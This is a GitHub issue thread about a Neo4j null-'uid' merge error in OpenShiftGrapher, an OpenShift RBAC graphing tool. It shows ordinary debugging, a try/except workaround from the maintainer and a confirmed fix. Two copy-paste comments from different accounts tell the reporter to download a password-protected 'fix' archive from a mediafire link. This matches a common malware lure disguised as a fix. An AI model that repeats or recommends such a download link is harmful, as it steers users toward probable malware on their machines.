### ISSUE TITLE
Cannot merge the following node because of null property value for 'uid': (:User {uid: null})

### ISSUE THREAD

**Issue by jgirlich-iteratec** [maxDcb/OpenShiftGrapher#1]
I'm trying out this tool for the first time and have an OpenShift cluster I am connecting to. These were my steps:

1. Downlod AppImage from https://neo4j.com/download/ and run it (including entering activation key)
3. Create a user `opengraph` with a password in Neo4j
4. `oc login --server=https://[redacted]:6443 --web`
5. `oc whoami --show-token`
6. `python3 OpenShiftGrapher.py -a "https://[redacted]:6443" -t "[redacted]" -c all -u opengraph -p [redacted]`

This is the end of the output:
```
[...]
#### RoleBinding ####
RoleBinding progress = 0.11737089201877934%
RoleBinding progress = 0.2347417840375587%
RoleBinding progress = 0.35211267605633806%
RoleBinding progress = 0.4694835680751174%
RoleBinding progress = 0.5868544600938966%
RoleBinding progress = 0.7042253521126761%
RoleBinding progress = 0.8215962441314555%
RoleBinding progress = 0.9389671361502347%
RoleBinding progress = 1.056338028169014%
RoleBinding progress = 1.1737089201877933%
RoleBinding progress = 1.2910798122065728%
RoleBinding progress = 1.4084507042253522%
RoleBinding progress = 1.5258215962441315%
RoleBinding progress = 1.643192488262911%
RoleBinding progress = 1.7605633802816902%
RoleBinding progress = 1.8779342723004695%
RoleBinding progress = 1.9953051643192488%
RoleBinding progress = 2.112676056338028%
RoleBinding progress = 2.2300469483568075%
RoleBinding progress = 2.3474178403755865%
Traceback (most recent call last):
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/OpenShiftGrapher.py", line 623, in <module>
    node = tx.merge(userNode) 
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/database.py", line 1132, in merge
    merge(self, primary_label, primary_key)
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/data.py", line 318, in __db_merge__
    identities = [record[0] for record in tx.run(*pq)]
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/database.py", line 992, in run
    self._connector.pull(result, -1)
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/client/__init__.py", line 1434, in pull
    cx.pull(result, n=n)
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/client/bolt.py", line 1001, in pull
    self._audit(self._transaction)
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/client/bolt.py", line 810, in _audit
    task.audit()
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/client/bolt.py", line 1140, in audit
    item.audit()
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/client/bolt.py", line 1140, in audit
    item.audit()
  File "/home/jgirlich/Dokumente/Tools/OpenShiftGrapher/venv/lib/python3.10/site-packages/py2neo/client/bolt.py", line 1303, in audit
    raise self._failure
py2neo.errors.ClientError: [Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
```
Would it be possible to skip broken user IDs?

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by maxDcb** [comment]
Hello,

It seems that somehow the "subjectName" of the node that is handle is empty. Could you try to put a try catch around the graph instruction like so:

```
                try:
                    tx = graph.begin()
                    r2 = Relationship(userNode, "HAS ROLEBINDING", rolebindingNode)
                    if roleKind == "ClusterRole":
                        r3 = Relationship(rolebindingNode, "HAS CLUSTERROLE", roleNode)
                    elif roleKind == "Role":
                        r3 = Relationship(rolebindingNode, "HAS ROLE", roleNode)
                    node = tx.merge(userNode) 
                    node = tx.merge(rolebindingNode) 
                    node = tx.merge(roleNode) 
                    node = tx.merge(r2) 
                    node = tx.merge(r3) 
                    graph.commit(tx)
                except: 
                    pass
```

It should let you progress, but it will not fix the underlining issue. On my side I will try to prevent the script to stop by catching such exception and put a warning in the console.

**Comment by maxDcb** [comment]
I pushed a new commit that should ignore corner cases, like the one that you encounter, you can see in the console the associated exception.
I also updated the example queries. 
Please feel free to post any issue that you encounter.

**Comment by jgirlich-iteratec** [comment]
The output looks like this now, but it works and I get a graph in the end.
```
[...]
#### RoleBinding ####
RoleBinding progress = 0.11695906432748539%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 0.23391812865497078%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 0.3508771929824561%
[-] RoleBinding subjectKind not handled Group
RoleBinding progress = 0.46783625730994155%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 0.5847953216374269%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 0.7017543859649122%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 0.8187134502923977%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 0.9356725146198831%
[-] RoleBinding subjectKind not handled Group
RoleBinding progress = 1.0526315789473684%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 1.1695906432748537%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 1.2865497076023393%
[-] RoleBinding subjectKind not handled Group
RoleBinding progress = 1.4035087719298245%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 1.5204678362573099%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 1.6374269005847955%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 1.7543859649122806%
[-] RoleBinding subjectKind not handled Group
RoleBinding progress = 1.8713450292397662%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 1.9883040935672516%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 2.1052631578947367%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 2.2222222222222223%
[-] RoleBinding subjectKind not handled Group
RoleBinding progress = 2.3391812865497075%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 2.456140350877193%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 2.5730994152046787%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 2.690058479532164%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 2.807017543859649%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 2.923976608187134%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.0409356725146197%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.1578947368421053%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.274853801169591%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.3918128654970756%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.508771929824561%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.625730994152047%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.7426900584795324%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.8596491228070176%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 3.976608187134503%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.093567251461988%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.2105263157894735%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.3274853801169595%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.444444444444445%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.56140350877193%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.678362573099415%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.7953216374269%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 4.912280701754386%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.029239766081871%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.146198830409357%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.263157894736842%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.380116959064328%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.497076023391813%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.614035087719298%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.730994152046784%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.847953216374268%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 5.964912280701754%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.081871345029239%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.1988304093567255%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.315789473684211%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.432748538011696%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.549707602339182%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.666666666666667%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.783625730994151%
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
RoleBinding progress = 6.900584795321637%
[-] RoleBinding subjectKind not handled User
[-] RoleBinding subjectKind not handled User
RoleBinding progress = 7.017543859649122%
[-] RoleBinding subjectKind not handled User
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 7.1345029239766085%
[-] RoleBinding subjectKind not handled User
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 7.251461988304094%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 7.368421052631578%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 7.485380116959065%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 7.602339181286549%
[-] RoleBinding subjectKind not handled ServiceAccount
RoleBinding progress = 7.719298245614035%
[-] RoleBinding subjectKind not handled ServiceAccount
[...]
```
The message `RoleBinding subjectKind not handled ServiceAccount` is repeated a lot.

Thanks a lot!

**Comment by maxDcb** [comment]
Thanks for you response! I spotted a indentation issue, that's why we see the:
"[-] RoleBinding subjectKind not handled ServiceAccount"
I fix it right away.

**Comment by maxDcb** [comment]
If you care about the value of the node that return a null value, you can try to enable the 
# print(enum) 
to figure out why the subject is empty.

**Comment by jgirlich-iteratec** [comment]
I moved the `print(enum)` into the `except` part of the code. Otherwise it was way too much output (at line 815):
```
                    except Exception as e: 
                        if release:
                            print(enum)
                            print(e)
                            pass
                        else:
                            exc_type, exc_obj, exc_tb = sys.exc_info()
                            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                            print(exc_type, fname, exc_tb.tb_lineno)
                            print("Error:", e)
                            sys.exit(1)
```
This is the output:
```
{'apiVersion': 'rbac.authorization.k8s.io/v1',
 'kind': 'RoleBinding',
 'metadata': {'creationTimestamp': '2024-06-09T09:34:56Z',
 'managedFields': [{'apiVersion': 'rbac.authorization.k8s.io/v1',
 'fieldsType': 'FieldsV1',
 'fieldsV1': {'f:roleRef': {}, 'f:subjects': {}},
 'manager': 'openshift-apiserver',
 'operation': 'Update',
 'time': '2024-06-09T09:34:56Z'}],
 'name': 'xxxxxx',
 'namespace': 'xxxxxxxx',
 'resourceVersion': '1038443',
 'uid': 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'},
 'roleRef': {'apiGroup': 'rbac.authorization.k8s.io',
 'kind': 'ClusterRole',
 'name': 'xxxxxxx'},
 'subjects': [{'apiGroup': 'rbac.authorization.k8s.io',
 'kind': 'User',
 'name': 'xxxxxxxx'}]}
[Statement.SemanticError] Cannot merge the following node because of null property value for 'uid': (:User {uid: null})
```
The user id field contains a UUID. I don't understand why it's failing here. Maybe I did something wrong?

**Comment by maxDcb** [comment]
Hi,
I fixed the issue. it was a confusion in the node creation! Thanks for your help and the information. I didn't have this case in my own test cluster.

**Comment by jgirlich-iteratec** [comment]
Great, works without a problem now!
